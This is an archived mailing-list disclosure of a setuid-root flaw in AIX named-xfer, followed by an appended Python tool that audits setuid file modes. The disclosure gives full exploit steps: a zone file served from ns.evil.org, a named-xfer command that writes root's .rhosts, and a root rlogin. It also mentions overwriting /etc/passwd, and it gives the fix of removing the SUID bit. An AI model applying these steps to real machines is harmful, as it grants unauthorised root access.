Aleph,

I thought I posted this to the list almost two years ago, but I never saw it show up and it hasn't turned up in any of the usual archives of such things. I didn't bother to save a copy so I just figured, oh well. It turns out a friend that I sent it to saved a copy, so here it is again (below) for the sake of posterity.

- Kyle

Kyle Amon
email: amonkat_private
url: http://www.gnutec.com/~amonk
KeyID 1024/26DD13D9
Fingerprint = 7D 86 D1 AE 4B E9 91 6A 4B BC B5 B4 12 F0 D3 1A

A man denied legal counsel, held without bail or trial, is a political prisoner in any country, especially the United States of America!
http://www.kevinmitnick.com
http://www.2600.com/kevin

Petition to Microsoft Corporation for Open Source Consumer Windows!
http://www.linuxresources.com/linuxreview/petition.html

---------- Forwarded message ----------
Date: Thu, 18 Feb 1999 22:08:12 -0500 (EST)
From: Cherie Earnest <cherieat_private>
To: Kyle Amon <amonkat_private>
Subject: named-xfer hole on AIX (fwd)

---------- Forwarded message ----------
Date: Thu, 8 Jan 1998 07:58:48 -0500 (EST)
From: amonkat_private
To: cherieat_private
Subject: named-xfer hole on AIX (fwd)

Friends, Romans, Geeks,

I don't know if anyone's noticed this before, but if so I ain't heard about it so here goes nuthin... :-)

On AIX, named-xfer has the following permissions...
-r-sr-xr--   1 root     system     32578 Feb 18 1997 /usr/sbin/named-xfer

which of course means that only root and members of the system group have execute permission but that (since the SUID bit is set) it executes as root even when run by non-root members of the system group. So, although one would have to already be a member of the system group (or manage to obtain such status) in order to exploit the problem described here, it's still a rather significant problem. And it's much worse than the old sendmail -C problem, which was still exploitable in AIX up until very recently when one was a member of the system group. The big difference here being that sendmail -C only let one read files they shouldn't have been able to read whereas this problem lets one write them :-).

The problem is that named-xfer writes its resulting zone file (when using the -f option) without (or at least before) relinquishing its root privilege (and I doubt it ever relinquishes it since it doesn't really need it in the first place).

So, for example, if one were to set up a zone at ns.evil.org in the following manner...

putting this in the named.boot file...

primary + db.hack

and giving db.hack contents as follows...

@ IN SOA evil.org. nsa.evil.org. (
     666      ; Serial
     10800    ; Refresh
     3600     ; Retry
     3600000  ; Expire
     86400 )  ; Minimum TTL

then run a command like this on some victim AIX machine...

named-xfer -z + -f /.rhosts ns.evil.org

they will put this file in root's home directory... :-)

-rw-r--r--   1 root     system       155 Jan  8 03:52 .rhosts

with contents of this... :-)

; zone '+' last serial 0
; from 10.10.10.10 at Thu Jan 8 03:52:19 1998
$ORIGIN .
+ IN SOA evil.org. nsa.evil.org. (
     666 10800 3600 3600000 86400 )

All they need do then is create a user like this (anywhere)...

IN:!:666:1::/home/IN:/bin/ksh

and login or su to it then rlogin to victim AIX machine as root! :-) Isn't that special? So now we have reason number 9999 not to run the BSD "r" commands on our machines.
And as I'm sure you all know, this is but one semi-creative use for this. I'm sure the gentle reader will be able to come up with a handful of others... and the not so gentle reader will immediately see possibilities for overwriting the /etc/passwd file or the kernel. :-(

Now, lest you think me a true cad, the simple fix is that the damn thing doesn't need its SUID bit set in order to work (why it comes with it on, I couldn't imagine). So, check yer boxes boys n girls and dump this here bit from this here program. :-)

Best Regards,
Kyle

P.S. I only verified this on AIX 4.1.5 and 4.2.1 but it is likely a pervasive problem.

Kyle Amon                      email: amonkat_private
Unix Systems Administrator     phone: (203) 486-3290
Security Specialist            pager: 1-800-759-8888 PIN 1616512
IBM Global Services               or 1616512at_private
email: amonkat_private
url: http://www.gnutec.com/kyle
KeyID 1024/173D96C9
Fingerprint = 90 4F 0B D4 2D 37 E7 61 1A 31 7B F2 72 04 66 1A

Windows 95: A 32-bit patch for a 16-bit GUI shell running on top of an 8-bit operating system written for a 4-bit processor by a 2-bit company who cannot stand 1 bit of competition.
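The "check yer boxes" step above boils down to one question about a file's mode: is it setuid root and also executable by its group or by everyone, so that non-root accounts run it with root privilege? The following audit helper is an added example, not code from the post or from IBM; the function names (`parse_ls_mode`, `risky_setuid`, `hardened_mode`, `audit_st_mode`, `audit_path`) are my own. It checks both an `ls -l` style mode string like the `-r-sr-xr--` shown above and a live file's `stat()` result, and reports the mode the post's fix would leave behind (the same bits with setuid cleared).

```python
import os
import stat

# Defensive audit for the named-xfer finding: a binary that is setuid root
# AND executable by its group (or by everyone) lets those non-root users run
# it as root. Added example, not part of the original post; helper names are
# my own.

ROOT_UID = 0


def parse_ls_mode(mode: str) -> dict:
    """Parse a 10-character ls -l mode string such as '-r-sr-xr--'.

    Column 0 is the file type; columns 1-9 are user, group, other rwx.
    's'/'S' in the user or group execute column means setuid/setgid,
    't'/'T' in the other execute column means sticky.
    """
    if len(mode) != 10:
        raise ValueError("expected a 10-character ls -l mode string")
    perms = mode[1:]
    return {
        "setuid": perms[2] in "sS",
        "setgid": perms[5] in "sS",
        "sticky": perms[8] in "tT",
        "user_x": perms[2] in "xs",
        "group_x": perms[5] in "xs",
        "other_x": perms[8] in "xt",
    }


def risky_setuid(mode: str, owner: str) -> bool:
    """True for the named-xfer pattern: setuid, owned by root, and runnable
    by group members or by everyone (so someone other than root gets uid 0)."""
    bits = parse_ls_mode(mode)
    return bits["setuid"] and owner == "root" and (bits["group_x"] or bits["other_x"])


def hardened_mode(mode: str) -> str:
    """Return the same mode string with the setuid bit dropped (the fix the
    post recommends); the owner's execute bit is kept if it was present."""
    bits = parse_ls_mode(mode)
    user_x = "x" if bits["user_x"] else "-"
    return mode[:3] + user_x + mode[4:]


def audit_st_mode(st_mode: int, st_uid: int) -> dict:
    """Same check on raw stat() values, so it can be run against live files."""
    setuid = bool(st_mode & stat.S_ISUID)
    group_x = bool(st_mode & stat.S_IXGRP)
    other_x = bool(st_mode & stat.S_IXOTH)
    return {
        "setuid": setuid,
        "owner_root": st_uid == ROOT_UID,
        "group_x": group_x,
        "other_x": other_x,
        "risky": setuid and st_uid == ROOT_UID and (group_x or other_x),
        # Permission bits as they would look after `chmod u-s`.
        "fixed_mode": oct(stat.S_IMODE(st_mode) & ~stat.S_ISUID),
    }


def audit_path(path: str) -> dict:
    """Audit one file on disk, e.g. /usr/sbin/named-xfer."""
    st = os.stat(path)
    result = audit_st_mode(st.st_mode, st.st_uid)
    result["path"] = path
    return result


if __name__ == "__main__":
    # The mode quoted in the post: setuid root, group-executable.
    print(risky_setuid("-r-sr-xr--", "root"))   # True
    print(hardened_mode("-r-sr-xr--"))          # -r-xr-xr--
    for candidate in ("/usr/sbin/named-xfer", "/usr/bin/passwd"):
        if os.path.exists(candidate):
            print(audit_path(candidate))
```

The string-based check is handy for reviewing `ls -l` output pasted from a box you cannot log in to; `audit_path` does the same against the real inode, and its `fixed_mode` field is the octal mode to hand to `chmod` once you have confirmed, as the post says, that the program works without the bit.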
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:05:15 PDT